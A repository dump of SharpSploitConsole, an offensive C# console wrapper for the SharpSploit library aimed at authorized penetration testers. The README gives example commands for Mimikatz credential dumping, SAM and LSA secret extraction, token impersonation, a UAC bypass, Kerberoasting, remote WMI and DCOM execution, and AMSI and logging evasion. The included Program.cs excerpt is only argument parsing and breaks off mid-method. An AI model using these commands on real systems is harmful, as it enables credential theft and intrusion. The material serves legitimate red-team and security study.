├── sharpsploitimg1.PNG ├── sharpsploitimg2.PNG ├── SharpSploitConsole ├── FodyWeavers.xml ├── App.config ├── packages.config ├── Properties │ └── AssemblyInfo.cs ├── SharpSploitConsole.csproj └── Program.cs ├── SharpSploitConsole.sln ├── .gitattributes ├── .gitignore └── README.md /sharpsploitimg1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anthemtotheego/SharpSploitConsole/HEAD/sharpsploitimg1.PNG -------------------------------------------------------------------------------- /sharpsploitimg2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anthemtotheego/SharpSploitConsole/HEAD/sharpsploitimg2.PNG -------------------------------------------------------------------------------- /SharpSploitConsole/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /SharpSploitConsole/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SharpSploitConsole/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /SharpSploitConsole/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("SharpSploitConsole")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSploitConsole")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("3787435b-8352-4bd8-a1c6-e5a1b73921f4")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSploitConsole.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27130.2010 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSploitConsole", "SharpSploitConsole\SharpSploitConsole.csproj", "{3787435B-8352-4BD8-A1C6-E5A1B73921F4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Debug|x86 = Debug|x86 13 | Release|Any CPU = Release|Any CPU 14 | 
Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x64.ActiveCfg = Debug|x64 21 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x64.Build.0 = Debug|x64 22 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x86.ActiveCfg = Debug|x86 23 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Debug|x86.Build.0 = Debug|x86 24 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x64.ActiveCfg = Release|x64 27 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x64.Build.0 = Release|x64 28 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x86.ActiveCfg = Release|x86 29 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4}.Release|x86.Build.0 = Release|x86 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {149543D6-75B1-4D0D-A528-B0DD7EC7D1AE} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 
8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | 
# Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 
159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. 
Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /SharpSploitConsole/SharpSploitConsole.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {3787435B-8352-4BD8-A1C6-E5A1B73921F4} 8 | Exe 9 | SharpSploitConsole 10 | SharpSploitConsole 11 | v4.6.1 12 | 512 13 | true 14 | 15 | 16 | publish\ 17 | true 18 | Disk 19 | false 20 | Foreground 21 | 7 22 | Days 23 | false 24 | false 25 | true 26 | 0 27 | 1.0.0.%2a 28 | false 29 | false 30 | true 31 | 32 | 33 | AnyCPU 34 | true 35 | full 36 | false 37 | bin\Debug\ 38 | DEBUG;TRACE 39 | prompt 40 | 4 41 | 42 | 43 | AnyCPU 44 | pdbonly 45 | true 46 | bin\Release\ 47 | TRACE 48 | prompt 49 | 4 50 | 51 | 52 | true 53 | bin\x64\Debug\ 54 | DEBUG;TRACE 55 | 
full 56 | x64 57 | prompt 58 | MinimumRecommendedRules.ruleset 59 | true 60 | 61 | 62 | bin\x64\Release\ 63 | TRACE 64 | true 65 | pdbonly 66 | x64 67 | prompt 68 | MinimumRecommendedRules.ruleset 69 | true 70 | 71 | 72 | true 73 | bin\x86\Debug\ 74 | DEBUG;TRACE 75 | full 76 | x86 77 | prompt 78 | MinimumRecommendedRules.ruleset 79 | true 80 | 81 | 82 | bin\x86\Release\ 83 | TRACE 84 | true 85 | pdbonly 86 | x86 87 | prompt 88 | MinimumRecommendedRules.ruleset 89 | true 90 | 91 | 92 | 93 | ..\packages\Costura.Fody.3.1.3\lib\net46\Costura.dll 94 | 95 | 96 | False 97 | bin\x64\Debug\SharpSploit.dll 98 | 99 | 100 | 101 | 102 | 103 | False 104 | bin\x64\Debug\System.Management.Automation.dll 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | False 124 | Microsoft .NET Framework 4.6.1 %28x86 and x64%29 125 | true 126 | 127 | 128 | False 129 | .NET Framework 3.5 SP1 130 | false 131 | 132 | 133 | 134 | 135 | 136 | 137 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 138 | 139 | 140 | 141 | 142 | 143 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpSploitConsole 2 | 3 | Console Application designed to interact with SharpSploit released by @cobbr_io > https://github.com/cobbr/SharpSploit 4 | 5 | SharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL. It's awesome so check it out! 6 | 7 | Description 8 | ============ 9 | SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. 
By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an authorized, in-scope target system and run over a non-interactive shell (such as beacon). 10 | 11 | This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system. 12 | 13 | Lastly, I am aware there are probably thousands of ways to make this better, faster, cooler, stealthier etc. So please feel free to let me know....in a nice way. :) I also plan to add more modules and improve others. 14 | 15 | Contact at: 16 | - Twitter: @anthemtotheego or @g0ldengunsec 17 | 18 | **Before submitting issues, this tool may not always be updated actively. I encourage you to borrow, add, mod, and/or make your own. Remember, all the awesome code out there (and there is a lot) can be taken/modified to create your own custom tools.** 19 | 20 | ![Alt text](/sharpsploitimg1.PNG?raw=true "SharpSploitConsole") 21 | ![Alt text](/sharpsploitimg2.PNG?raw=true "") 22 | 23 | Setup - Quick and Dirty 24 | ============================== 25 | 26 | **Note: I used Windows 10, Visual Studio 2017 - mileage may vary** 27 | 28 | 1. Download SharpSploit tool from https://github.com/cobbr/SharpSploit.git 29 | 30 | 2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for the correct architecture - the SharpSploitConsole project file references the x64 Debug output, so these instructions assume x64) - Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok. 31 | 32 | 3. Download SharpSploitConsole tool and open up SharpSploitConsole.sln 33 | 34 | 4. Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder. Use the DLLs from your own build in step 2: Costura embeds whatever copies are sitting in that folder at build time, so this is the point where an untrusted or tampered DLL would end up inside your final binary. 35 | 36 | 5. 
Next we will set up visual studio to embed our DLLs into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following: 37 | 38 | In visual studio: 39 | 40 | a. Tools > NuGet Package Manager > Package Manager Console 41 | 42 | b. Inside console run (the checked-in project references Costura.Fody 3.1.3, so pin that version if a newer release behaves differently): 43 | 44 | Install-Package Costura.Fody 45 | 46 | c. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders. 47 | 48 | 49 | 50 | 51 | 52 | 53 | 6. Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLLs, select them and add them. 54 | 55 | 7. Compile, drop binary on target computer and have fun. 56 | 57 | Examples 58 | ======== 59 | 60 | Note: All command names are case insensitive (the option names of the domain enumeration modules, e.g. `-target`, are looked up as written, so give them in lowercase as shown) 61 | 62 | By default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell. Keep in mind that command line arguments - including the plaintext passwords several modules below take - are captured by process creation telemetry on the target (e.g. Windows event 4688 with command line auditing, or Sysmon), so avoid passing credentials on the command line where that matters. 
63 | 64 | Start interactive console mode: 65 | 66 | ```Interact``` 67 | 68 | Mimikatz all the things (does not run DCSync) - requires admin or system: 69 | 70 | ```Mimi-All``` 71 | 72 | Runs a specific Mimikatz command of your choice - requires admin or system: 73 | 74 | ```Mimi-Command privilege::debug sekurlsa::logonPasswords``` 75 | 76 | Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords - requires admin or system: 77 | 78 | ```logonPasswords``` 79 | 80 | Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from registry - requires admin or system: 81 | 82 | ```LsaCache``` 83 | 84 | Runs the Mimikatz command to retrieve LSA Secrets stored in registry - requires admin or system: 85 | 86 | ```LsaSecrets``` 87 | 88 | Retrieve password hashes from the SAM database - requires admin or system: 89 | 90 | ```SamDump``` 91 | 92 | Retrieve Wdigest credentials from registry - requires admin or system: 93 | 94 | ```Wdigest``` 95 | 96 | Retrieve current user: 97 | 98 | ```whoami``` 99 | 100 | ```Username``` 101 | 102 | Impersonate system user - requires admin rights: 103 | 104 | ```GetSystem``` 105 | 106 | Impersonate a process token - impersonates the token of a specified process (for example one running as SYSTEM or as another user), requires pid - command requires admin rights: 107 | 108 | ```Impersonate 2918``` 109 | 110 | Bypass UAC - requires binary | command | path to binary - requires the current user to be a local administrator (a UAC bypass elevates an existing medium-integrity admin session; it does not give a standard user admin rights): 111 | 112 | ```BypassUAC cmd.exe ipconfig C:\Windows\System32\``` 113 | 114 | ```BypassUAC cmd.exe "" C:\Windows\System32\``` 115 | 116 | Ends the impersonation of any token, reverts back to initial token associated with current process: 117 | 118 | ```RevertToSelf``` 119 | 120 | Retrieve current working directory: 121 | 122 | ```CurrentDirectory``` 123 | 124 | Retrieve current directory listing: 125 | 126 | ```DirectoryListing``` 127 | 128 | Changes the current directory by appending a specified string to the current working directory: 129 | 130 | ```ChangeDirectory SomeFolder``` 131 | 132 | 
Retrieve hostname: 133 | 134 | ```Hostname``` 135 | 136 | Retrieve list of running processes: 137 | 138 | ```ProcessList``` 139 | 140 | Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin: 141 | 142 | ```ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp``` 143 | 144 | Retrieve registry path value, requires full path argument: 145 | 146 | ```ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber``` 147 | 148 | Write to registry, requires full path argument and value argument: 149 | 150 | ```WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1``` 151 | 152 | Retrieve users of local group remotely, requires computername | groupname | username | password: 153 | 154 | ```NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!``` 155 | 156 | ```NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!``` 157 | 158 | Retrieve local groups remotely, requires computername | username | password: 159 | 160 | ```NetLocalGroups computerName domain\username P@55w0rd!``` 161 | 162 | ```NetLocalGroups 192.168.1.20 .\username P@55w0rd!``` 163 | 164 | Retrieve current logged on users remotely, requires computername | username | password: 165 | 166 | ```NetLoggedOnUsers computerName domain\username P@55w0rd!``` 167 | 168 | ```NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!``` 169 | 170 | Retrieve user sessions remotely, requires computername | username | password: 171 | 172 | ```NetSessions computerName domain\username P@55w0rd!``` 173 | 174 | ```NetSessions 192.168.1.20 .\username P@55w0rd!``` 175 | 176 | Ping systems, requires computernames: 177 | 178 | ```Ping computer1 computer2 computer3 computer4``` 179 | 180 | Port scan systems, requires computername | ports: 181 | 182 | ```PortScan computer1 80 443 445 22 23``` 183 | 184 | Get Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user 
context. optional arguments: -username -password -domain -server -searchbase -searchstring -target: 185 | 186 | ```GetDomainUsers``` 187 | 188 | Get Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target: 189 | 190 | ```GetDomainGroups``` 191 | 192 | ```GetDomainGroups -target "Domain Admins"``` 193 | 194 | Get Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target: 195 | 196 | ```GetDomainComputers``` 197 | 198 | Perform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target 199 | 200 | ```Kerberoast``` 201 | 202 | ```Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService``` 203 | 204 | Run command remotely via WMI, requires computername | username | password | command - requires admin: 205 | 206 | ```WMI computer1 domain\username P@55w0rd! <command>``` 207 | 208 | ```WMI computer1 .\username P@55w0rd! 
powershell -noP -sta -w 1 -enc <base64 encoded command>``` 209 | 210 | Run command remotely via DCOM, requires computername | command | directory | params - requires admin: 211 | 212 | ```DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <base64 encoded command>``` 213 | 214 | Run shell command: 215 | 216 | ```Shell ipconfig /all``` 217 | 218 | Run powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging: 219 | 220 | ```Powershell -noP -sta -w 1 -enc <base64 encoded command>``` 221 | 222 | # Currently available options (more to come) 223 | 224 | - **Interact** : Starts interactive console mode, if you are interacting remotely you may not want to use this option 225 | - **Mimi-All** : Executes everything but DCSync, requires admin 226 | - **Mimi-Command** : Executes a chosen Mimikatz command 227 | - **logonPasswords** : Runs privilege::debug sekurlsa::logonPasswords 228 | - **LsaCache** : Retrieve Domain Cached Credentials hashes from registry 229 | - **LsaSecrets** : Retrieve LSA secrets stored in registry 230 | - **SamDump** : Retrieve password hashes from the SAM database 231 | - **Wdigest** : Retrieve Wdigest credentials from registry 232 | - **whoami** : Retrieve current user 233 | - **GetSystem** : Impersonate system user, requires admin rights 234 | - **Impersonate** : Impersonate the token of a specified process, requires pid - command requires admin rights. 
235 | - **BypassUAC** : Bypass UAC, requires binary | command | path to binary - requires admin rights 236 | - **RevertToSelf** : Ends the impersonation of any token, reverts back to initial token associated with current process 237 | - **CurrentDirectory** : Retrieve current working directory 238 | - **DirectoryListing** : Retrieve current directory listing 239 | - **ChangeDirectory** : Changes the current directory by appending a specified string to the current working directory 240 | - **Hostname** : Retrieve hostname 241 | - **ProcessList** : Retrieve list of running processes 242 | - **ProcDump** : Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin 243 | - **Username** : Retrieve current username 244 | - **ReadRegistry** : Retrieve registry path value, requires full path argument 245 | - **WriteRegistry** : Write to registry, requires full path argument | value (writes under HKEY_LOCAL_MACHINE require admin, and the change persists on the target - note it for cleanup) 246 | - **NetLocalGroupMembers** : Retrieve users of local group remotely, requires computername | groupname | username | password 247 | - **NetLocalGroups** : Retrieve local groups remotely, requires computername | username | password 248 | - **NetLoggedOnUsers** : Retrieve current logged on users remotely, requires computername | username | password 249 | - **NetSessions** : Retrieve user sessions remotely, requires computername | username | password 250 | - **Ping** : Ping systems, requires computernames 251 | - **PortScan** : Port scan systems, requires computername | ports 252 | - **GetDomainUsers** : Grabs specified (or all) user objects in the target domain, by default will use current user context 253 | - **GetDomainGroups** : Grabs specified (or all) group objects in the target domain, by default will use current user context 254 | - **GetDomainComputers** : Grabs specified (or all) computer objects in the target domain, by default will use current user context 255 | - **Kerberoast** : Performs a kerberoasting attack against 
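targeted (or all) user objects in the target domain, by default will use current user context 256 | - **WMI** : Run command remotely via WMI, requires computername | username | password | command | requires admin 257 | - **DCOM** : Run command remotely via DCOM, requires computername | command | directory | params - requires admin 258 | - **Shell** : Run a shell command 259 | - **Powershell** : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging 260 | 261 | -------------------------------------------------------------------------------- /SharpSploitConsole/Program.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;

/*
Authors: @anthemtotheego and @g0ldengunsec
License: BSD 3-Clause
Find Sharpsploit: https://github.com/cobbr/SharpSploit
*/

namespace SharpSploitConsole
{
    class Program
    {
        // Entry point.
        //   no args            -> banner + help
        //   "interact"         -> banner + interactive console
        //   anything else      -> optional token step ("getsystem" or "impersonate <pid>")
        //                         is applied first, then the remaining args are dispatched
        //                         as a single command via commands().
        // The README promises case-insensitive commands; the token-step keywords are
        // therefore matched with OrdinalIgnoreCase everywhere (the original looked up
        // "impersonate" case-sensitively and threw on "Impersonate 2918").
        static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                art();
                help();
                return;
            }

            if (string.Equals(args[0], "interact", StringComparison.OrdinalIgnoreCase))
            {
                art();
                console();
                return;
            }

            // Token step first so the real command runs under the new token.
            // Only one of the two is honoured per invocation (getsystem wins), as before.
            if (args.Contains("getsystem", StringComparer.OrdinalIgnoreCase))
            {
                getSystem();
                args = args
                    .Where(x => !x.Equals("getsystem", StringComparison.OrdinalIgnoreCase))
                    .ToArray();
            }
            else if (args.Contains("impersonate", StringComparer.OrdinalIgnoreCase))
            {
                impersonateProcess(args);
                args = removeKeywordAndArgument(args, "impersonate");
            }

            // e.g. "sharpsploitconsole.exe getsystem" on its own: nothing left to run,
            // so do not hand an empty array to commands() (it indexes request[0]).
            if (args.Length == 0)
            {
                return;
            }

            commands(args);
        }

        // Returns a copy of args without the first case-insensitive match of keyword
        // and the token following it (its argument). If the keyword is the last token,
        // only the keyword is removed; if it is absent, args is returned unchanged.
        private static string[] removeKeywordAndArgument(string[] args, string keyword)
        {
            List<string> remaining = args.ToList();
            int index = remaining.FindIndex(x => x.Equals(keyword, StringComparison.OrdinalIgnoreCase));
            if (index < 0)
            {
                return args;
            }
            // Never remove past the end of the list (original RemoveRange(idx, 2) assumed a pid was present).
            int count = Math.Min(2, remaining.Count - index);
            remaining.RemoveRange(index, count);
            return remaining.ToArray();
        }

        //SharpSploit Command Modules
        private static void commands(string[]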
